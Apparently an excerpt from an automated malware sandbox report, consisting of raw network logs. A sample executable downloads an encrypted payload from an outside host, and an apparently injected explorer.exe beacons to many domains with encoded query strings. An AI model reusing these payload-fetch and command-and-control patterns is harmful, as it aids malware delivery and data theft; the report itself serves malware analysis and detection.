                                                                                                                        Nov 25, 2021 13:01:16.484146118 CET6775OUTData Raw: 51 56 66 35 38 53 61 6e 49 49 6b 47 28 59 6b 51 73 79 63 46 28 6b 74 56 33 31 53 73 56 32 6b 72 52 54 74 4a 69 4c 43 5f 58 32 46 4b 48 6b 66 34 47 78 39 59 57 4a 51 61 68 50 66 56 73 75 6b 50 64 38 69 57 31 39 7a 5f 37 42 6b 65 70 79 31 30 43 61
                                                                                                                        Data Ascii: QVf58SanIIkG(YkQsycF(ktV31SsV2krRTtJiLC_X2FKHkf4Gx9YWJQahPfVsukPd8iW19z_7Bkepy10CarraH0UXyfy8-uHUUSd9E2cqi5cAWB-psEkXodlLt1aA30pHMMLWm1aWuzUBgXAmAiVRiNc2LLa5bDT7Pr2~ezjTTiPMsCuOC(XiuxlKhno2Map0sQwdJEX3bFhmfI4gv(b0I(ingR598pcrepw8rwCXe0PqYzEHo5


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        22192.168.11.2049839203.170.80.25080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 13:01:16.189246893 CET6726OUTGET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1
                                                                                                                        Host: www.mackthetruck.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        3192.168.11.2049841107.6.148.162443C:\Users\user\Desktop\Zr26f1rL6r.exe
                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        4192.168.11.2049815104.21.76.22380C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 12:56:13.220035076 CET6421OUTGET /n8ds/?6ldD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&v6Mt=3fxxA4Z HTTP/1.1
                                                                                                                        Host: www.topwowshopping.store
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 25, 2021 12:56:13.382391930 CET6422INHTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 25 Nov 2021 11:56:13 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        cache-control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0
                                                                                                                        expires: 0
                                                                                                                        last-modified: Thu, 25 Nov 2021 11:56:13 GMT
                                                                                                                        pragma: no-cache
                                                                                                                        vary: Accept-Encoding
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wftVfpJA1zZJwjRaaheNSQN%2B47kW8NUpVPnztY9X9CDRJcJK3cSrWrr%2Fkh12oU%2BPDjaHHxgPOGqNMJdKZBB2VmnTOlRI%2FV3g8s4dK2XbZbitRDqmmAxJtUHBGjKUUJ1RfXt9WyadqG7lXv0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 6b3ab146a9874e37-FRA
                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                        Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a
                                                                                                                        Data Ascii: d404 Not Found
                                                                                                                        Nov 25, 2021 12:56:13.382405996 CET6422INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        5192.168.11.204981681.2.194.12880C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 12:56:28.546938896 CET6423OUTGET /n8ds/?6ldD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&v6Mt=3fxxA4Z HTTP/1.1
                                                                                                                        Host: www.growebox.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 25, 2021 12:56:28.576894045 CET6425INHTTP/1.1 200 OK
                                                                                                                        Date: Thu, 25 Nov 2021 11:56:28 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 3011
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 54 68 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 69 73 20 72 65 67 69 73 74 65 72 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 30 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 4f 52 50 53 49 20 6a 65 20 45 76 72 6f 70 73 6b e1 20 68 6f 75 73 69 6e 67 6f 76 e1 20 73 70 6f 6c 65 e8 6e 6f 73 74 2e 20 4e 61 62 ed 7a ed 20 73 6c 75 9e 62 79 20 77 65 62 68 6f 73 74 69 6e 67 75 2c 20 73 65 72 76 65 72 68 6f 73 74 69 6e 67 75 2c 20 72 65 67 69 73 74 72 61 63 65 20 64 6f 6d e9 6e 6f 76 fd 63 68 20 6a 6d 65 6e 20 61 20 77 77 77 20 73 74 72 e1 6e 6b 79 20 6e 61 20 73 65 72 76 65 72 65 63 68 20 57 69 6e 64 6f 77 73 2f 4c 69 6e 75 78 2e 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 72 70 73 69 2c 77 65 62 68 6f 73 74 69 6e 67 2c 64 6f 6d e9 6e 61 2c 64 6f 6d e9 6e 79 2c 68 6f 73 74 69 6e 67 2c 73 65 72 76 65 72 2c 73 65 72 76 65 72 68 6f 73 74 69 6e 67 2c 68 6f 75 73 69 6e 67 2c 73 65 72 76 65 72 68 6f 75 73 69 6e 67 2c 61 64 73 6c 2c 77 69 66 69 2c 77 69 2d 66 69 2c 64 6f 6d 61 69 6e 2c 64 6f 6d 61 69 6e 73 22 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0d 0a 09 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 32 35 34 39 63 3b 0d 0a 7d 0d 0a 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 7d 0d 0a 23 62 6f 78 20 7b 0d 0a 09 77 69 64 74 68 3a 20 35 32 30 70 78 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 09 74 6f 70 3a 20 31 36 30 70 78 3b 0d 0a 09 62 6f 72 64 65 72 3a 20 34 70 78 20 73 6f 6c 69 64 20 23 63 63 63 63 63 63 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 69 6d 67 2f 6c 6f 67 6f 5f 66 6f 72 70 73 69 2e 67 69 66 29 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 6c 65 66 74 20 74 6f 70 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 20 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 33 38 35 30 36 62 3b 0d 0a 7d 0d 0a 23 62 6f 78 32 20 7b 0d 0a 09 77 69 64 74 68 3a 20 35 32 30 70 78 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><title>The domain name is registered</title><meta name="robots" content="noindex, nofollow"><meta http-equiv="Content-Type" content="text/html; charset=windows-1250"><meta name="description" content="FORPSI je Evropsk housingov spolenost. Nabz sluby webhostingu, serverhostingu, registrace domnovch jmen a www strnky na serverech Windows/Linux."><meta name="keywords" content="forpsi,webhosting,domna,domny,hosting,server,serverhosting,housing,serverhousing,adsl,wifi,wi-fi,domain,domains"><style type="text/css">...html, body {margin: 0px;padding: 0px;height: 100%;background-color: #32549c;}#container {height: 100%;width: 100%;text-align: center;}#box {width: 520px;position: relative;margin: 0 auto;top: 160px;border: 4px solid #cccccc;background-color: #FFFFFF;background-image: url(img/logo_forpsi.gif);background-repeat: no-repeat;background-position: left top;padding: 20px;font-family : Verdana, Arial, Helvetica, sans-serif;font-size: 14px;color: #38506b;}#box2 {width: 520px;position: relative;margin:
                                                                                                                        Nov 25, 2021 12:56:28.576960087 CET6426INData Raw: 30 20 61 75 74 6f 3b 0d 0a 09 74 6f 70 3a 20 31 36 30 70 78 3b 0d 0a 09 62 6f 72 64 65 72 3a 20 34 70 78 20 73 6f 6c 69 64 20 23 63 63 63 63 63 63 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0d 0a 09
                                                                                                                        Data Ascii: 0 auto;top: 160px;border: 4px solid #cccccc;background-color: #FFFFFF;padding: 20px;font-family : Verdana, Arial, Helvetica, sans-serif;font-size: 14px;color: #38506b;}#flag {position: absolute;left: 95px;top
                                                                                                                        Nov 25, 2021 12:56:28.577003002 CET6426INData Raw: 61 63 75 74 65 3b 4e 41 20 4a 45 20 5a 41 52 45 47 49 53 54 52 4f 56 26 41 61 63 75 74 65 3b 4e 41 3c 2f 74 64 3e 0d 0a 20 20 3c 2f 74 72 3e 0d 0a 20 20 3c 74 72 3e 0d 0a 20 20 20 20 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 22 69 6d 67 2f 66 6c 61
                                                                                                                        Data Ascii: acute;NA JE ZAREGISTROV&Aacute;NA</td> </tr> <tr> <td><img src="img/flagSk.png" /></td> <td class="txt">DOM&Eacute;NA JE ZAREGISTROVAN&Aacute;</td> </tr> <tr> <td><img src="img/flagPol.gif" /></td> <td class="tx


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        6192.168.11.2049817164.155.212.13980C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 12:56:34.061800957 CET6427OUTGET /n8ds/?6ldD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&v6Mt=3fxxA4Z HTTP/1.1
                                                                                                                        Host: www.ayudavida.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 25, 2021 12:56:34.717901945 CET6428INHTTP/1.1 302 Moved Temporarily
                                                                                                                        Server: nginx/1.20.1
                                                                                                                        Date: Thu, 25 Nov 2021 11:56:34 GMT
                                                                                                                        Content-Type: text/html; charset=gbk
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                        Location: /404.html
                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        7192.168.11.2049818172.120.157.18780C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 12:56:39.949610949 CET6429OUTGET /n8ds/?6ldD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&v6Mt=3fxxA4Z HTTP/1.1
                                                                                                                        Host: www.stylesbykee.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 25, 2021 12:56:40.114429951 CET6429INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 25 Nov 2021 11:56:30 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 801
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e b3 a4 c9 b3 ce cf b6 d9 bf c6 bc bc b9 c9 b7 dd d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                        Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></head><body><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        8192.168.11.20498193.64.163.5080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 12:56:50.191874981 CET6431OUTGET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1
                                                                                                                        Host: www.inklusion.online
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 25, 2021 12:56:50.203358889 CET6431INHTTP/1.1 410 Gone
                                                                                                                        Server: openresty
                                                                                                                        Date: Thu, 25 Nov 2021 11:56:49 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 63 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='5; url=http://www.inklusion.online/' />a </head>9 <body>3c You are being redirected to http://www.inklusion.onlinea </body>8</html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        9192.168.11.2049820203.170.80.25080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 12:57:06.036454916 CET6432OUTGET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1
                                                                                                                        Host: www.mackthetruck.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:


                                                                                                                        HTTPS Proxied Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        0192.168.11.2049812107.6.148.162443C:\Users\user\Desktop\Zr26f1rL6r.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-11-25 11:54:54 UTC0OUTGET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Host: atseasonals.com
                                                                                                                        Cache-Control: no-cache
                                                                                                                        2021-11-25 11:54:54 UTC0INHTTP/1.1 200 OK
                                                                                                                        Date: Thu, 25 Nov 2021 11:54:54 GMT
                                                                                                                        Server: Apache
                                                                                                                        Last-Modified: Wed, 24 Nov 2021 12:20:38 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 167488
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/octet-stream
                                                                                                                        2021-11-25 11:54:54 UTC0INData Raw: 70 99 d0 d2 81 fc a4 8c 6e ba 05 d0 4f 67 65 7f 4e 1e 4a f3 03 49 ab 4d f8 3b 67 96 a3 b5 f7 07 46 d9 a0 8b 7f 32 0c 43 a2 5a 42 b2 12 de b0 f4 94 d3 dc 46 6c cf 8e 15 59 63 2a 6b 99 39 71 c3 a8 94 6c 4a 84 13 81 5d 6a 1e 54 51 46 ba f1 ed d4 08 c0 6b 8d b8 64 71 ec 91 c7 1a 01 6d 7f 49 a6 3a 51 3c d1 ca 0c 98 4f 06 47 24 6b ec 56 9c d7 39 29 7f 90 8f 10 2b ff c6 eb 49 87 e7 e0 70 77 e6 54 c0 aa f3 4b 59 89 c0 66 fa 8f 90 47 e4 0a 64 47 b5 d4 b5 71 92 58 65 b7 82 12 15 37 dd 6f c2 ec 2e 2b df 1d cf 2c 5e 7a d8 f2 d7 16 ec 09 81 e5 9d 39 0d e2 1d d4 71 ba ff de 2e 9b 03 5e 74 c4 af 5c 6d 82 2a 3a fb 21 10 13 c5 ce 56 69 4f 4e 29 b7 4f 90 af e9 9a cd 2d 39 69 e5 2b 66 10 5b b4 5e 9d e0 b1 b1 c0 09 52 76 c0 87 33 99 a3 bb ca 51 43 75 54 5b 4e a0 ab 74 91 19
                                                                                                                        Data Ascii: pnOgeNJIM;gF2CZBFlYc*k9qlJ]jTQFkdqmI:Q<OG$kV9)+IpwTKYfGdGqXe7o.+,^z9q.^t\m*:!ViON)O-9i+f[^Rv3QCuT[Nt
                                                                                                                        2021-11-25 11:54:54 UTC8INData Raw: 8e bc 4e ec 48 d6 a2 16 02 23 e6 e8 1f c6 a2 f1 87 bf bc dc f2 e5 1d 71 93 43 e5 f8 66 89 73 ea 07 49 9d 46 cf 62 29 04 b0 e9 ff 10 16 06 87 4d 38 5b 62 65 fc dc 00 f5 ba 79 ad 56 32 fd 03 8f fb 4b a3 5d d9 ce 81 4a 9e 3d 17 f4 d2 a1 c7 87 3d fd 91 4b 9a 13 dd 39 3b e3 c6 4f 06 1c 79 d3 83 26 00 53 1b 67 5c 44 5b d7 c5 62 93 8e 6f 5e 54 c7 c8 d9 a6 d5 ad 5a 6e da 10 69 c7 77 c2 68 d5 b1 0a 47 90 e0 8d 6a c4 32 66 27 47 62 84 7f 3d 22 1c 03 85 6c ab 59 45 eb 4f 70 ed 38 f2 31 d8 5d 7f f7 6a d4 8d e0 3d 2c 94 bd bd 34 7c 13 68 7f d2 e5 fe c7 04 85 50 1c bd f6 f8 38 d0 29 78 5b 26 a9 d3 c5 eb 01 5f 8a aa 88 23 3f 9d 0e a8 06 f9 96 8b 3e 21 23 9c 5b 82 da cd 2b 99 a0 fe 37 cb c6 17 31 d1 3e 34 39 7e 3f 48 2b bc 10 99 e2 7e 1d 53 6c e7 67 00 b8 4c cb 8f 35 3c
                                                                                                                        Data Ascii: NH#qCfsIFb)M8[beyV2K]J==K9;Oy&Sg\D[bo^TZniwhGj2f'Gb="lYEOp81]j=,4|hP8)x[&_#?>!#[+71>49~?H+~SlgL5<
                                                                                                                        2021-11-25 11:54:54 UTC15INData Raw: 17 ca c7 b5 b0 fd 86 d4 50 e2 18 b0 be fc 2c 30 5c 16 11 88 54 5e c2 28 df 35 9a e5 69 10 10 31 89 2f e6 ff 54 6f a8 c6 95 52 74 48 c3 55 81 2d a3 39 d4 90 8c de 8f ac 70 eb d0 5c 9a b4 cb c6 df e5 6e 92 bb e0 07 43 df 69 24 b6 a3 ff 52 4d 29 ca 8f 99 4e 68 fd 8d 02 21 f9 01 4f d0 f8 f4 b2 d7 01 9e 4f 32 70 2f 03 53 61 cf 97 3d 62 d8 cb 03 51 97 a7 1f fa e3 e0 00 ae 92 0e 09 13 96 7e 52 65 3e 2c 36 85 a9 5f 75 e6 c6 6b 89 c3 66 55 25 98 6d c9 f0 bf 96 47 05 9a 61 2d 1b 23 3c d2 96 92 82 cd d6 ba 3e e6 4b 58 a5 48 1a 87 7a 4e a4 a1 b0 2f c4 55 d6 16 76 a6 7e 33 3e 12 d9 fe 29 5c 1b e6 13 d5 ac a1 ad c2 77 9a 02 73 8b ad 40 f6 2c 55 64 27 90 b5 a5 e4 a9 df 87 eb b3 1f 0e 25 a1 6a 1c 00 e9 16 a1 dc 22 2a cc fc 49 cb 9d 4b 61 fc 33 db 5f 43 37 03 c7 17 86 ac
                                                                                                                        Data Ascii: P,0\T^(5i1/ToRtHU-9p\nCi$RM)Nh!OO2p/Sa=bQ~Re>,6_ukfU%mGa-#<>KXHzN/Uv~3>)\ws@,Ud'%j"*IKa3_C7
                                                                                                                        2021-11-25 11:54:54 UTC23INData Raw: 5e 04 43 a7 80 c5 2e bc ac 30 1b fd 04 75 d2 7b c3 ff 8f b3 94 45 75 96 b0 c1 0e c5 b4 fe 2c b1 ea f1 19 bc 38 04 74 40 f6 58 cf 71 0f 1d 37 59 d4 56 20 d6 3b 0b 08 06 2b 25 af 1c e8 5d 25 2b a9 a9 84 c0 fc 5c 15 9e 07 91 73 db 7e b9 86 27 ec 6f ef 41 31 47 63 86 4f b4 d0 c0 7e 85 7f 34 15 92 9b a9 64 70 cc de 9f a5 6e db 3f e8 ec 35 9e a0 26 0f 59 b8 24 95 fd 58 9f 6f 6a e5 01 85 0a 0b 08 6a e0 61 43 7d 0a 70 5d d7 d5 19 95 5a d5 8c f0 37 72 50 a0 cc f8 47 f9 ef af e9 4c 94 65 65 81 fa 5c 37 a8 cb a6 7c dd a5 58 79 e1 91 0a 47 af 03 bc cf 03 e8 4d d6 93 39 65 e6 7b 6a fb 85 bc aa 46 76 d9 b3 d3 9e 04 54 9e 7f e3 4f 52 87 33 b9 08 2f a0 02 a8 b2 21 6e 07 d1 3a 84 8d 7a 08 c8 80 91 23 98 0b cb b7 03 07 3e 34 a9 c8 c4 db f6 7c 5d 81 f9 6a 58 32 78 f5 85 ae
                                                                                                                        Data Ascii: ^C.0u{Eu,8t@Xq7YV ;+%]%+\s~'oA1GcO~4dpn?5&Y$XojjaC}p]Z7rPGLee\7|XyGM9e{jFvTOR3/!n:z#>4|]jX2x
